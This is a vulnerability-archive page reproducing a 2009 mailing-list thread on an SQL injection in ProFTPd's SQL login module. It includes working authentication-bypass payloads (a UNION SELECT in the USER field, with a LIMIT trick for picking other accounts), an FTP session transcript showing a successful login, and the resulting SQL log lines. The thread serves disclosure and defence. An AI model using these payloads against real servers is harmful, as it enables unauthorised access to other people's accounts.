Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:21338
HistoryFeb 12, 2009 - 12:00 a.m.

Re: Another SQL injection in ProFTPd with mod_mysql (probably postgres as well)

2009-02-1200:00:00
vulners.com
41
JSON

Looks like a very serious issue to me - it works on our ProFTPD
1.3.2rc2 Server (latest stable on gentoo).

220 ProFTPD 1.3.2rc2 Server (Pumpkin) [xx.xx.xx.xx]
USER %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #
331 Password required for %')
PASS 1
230 User %') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp # logged in

SQL log output:
query "SELECT username, password, uid, gid, homedir, shell FROM ftp
WHERE (username='{UNKNOWN TAG}') and 1=2 union select
1,0x24312452565a583533784324716a304d4d6b4670426b4b486177644264756634392f,uid,gid,homedir,shell
from ftp #') LIMIT 1"

> Hi,
>
> On Tue, 2009-02-10 at 19:49 +0000, [email protected] wrote:
> > Just found out a problem with proftpd's sql authentication. The
> > problem is easily reproducible if you login with username like:
> Could you please provide the version number which is affected by this?
> Running ProFTPD Version: 1.3.0 (stable) on Linux (Debian etch) I
> cannot reproduce your report.
>
> > USER %') and 1=2 union select 1,1,uid,gid,homedir,shell from users;
> > –
> >
> > and a password of "1" (without quotes).
> >
> > which leads to a successful login. Different account logins can be
> > made successful using the limit clase (e.g appending "LIMIT 5,1"
> > will make you login with as the 5th account in the users table).
> >
> > As far as I can see in the mysql logs the query becomes:
> > SELECT userid, passwd, uid, gid, homedir, shell FROM users WHERE
> > (userid='{UNKNOWN TAG}') and 1=2 union select
> > 1,1,uid,gid,homedir,shell from users limit 1,1; – ') LIMIT 1
> I can see proper escaping even when varying the SQL code provided.
> Here the MySQL log excerpt:
>
> SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
> (username='USER%\') and 1=2 union select 1,1,uid,gid,homedir,shell
> from ftp; –') LIMIT 1
>
> SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
> (username='USER %\') and 1=2 union select 1,1,uid,gid,homedir,shell
> from ftp; –') LIMIT 1
>
> SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
> (username='% \') and 1=2 union select 1,1,uid,gid,homedir,shell from
> ftp; –') LIMIT 1
>
> SELECT username, password, uid, gid, homedir, shell FROM ftp WHERE
> (username='%\') and 1=2 union select 1,1,uid,gid,homedir,shell from
> ftp; –') LIMIT 1
>
>
> >
> > I think the problem lies in the handling of the "%" character
> > (probably that's some way to sanitize input to avoid format string
> > things?).
> >
> > Anyway, %' effectively makes the single quote unescaped and that
> > eventually allows for an SQL injection during login.
> Did you inform the developers directly? I would be happy to get an
> update on this issue.
>
>
> Best,
> Daniel
>
>
>
>

JSON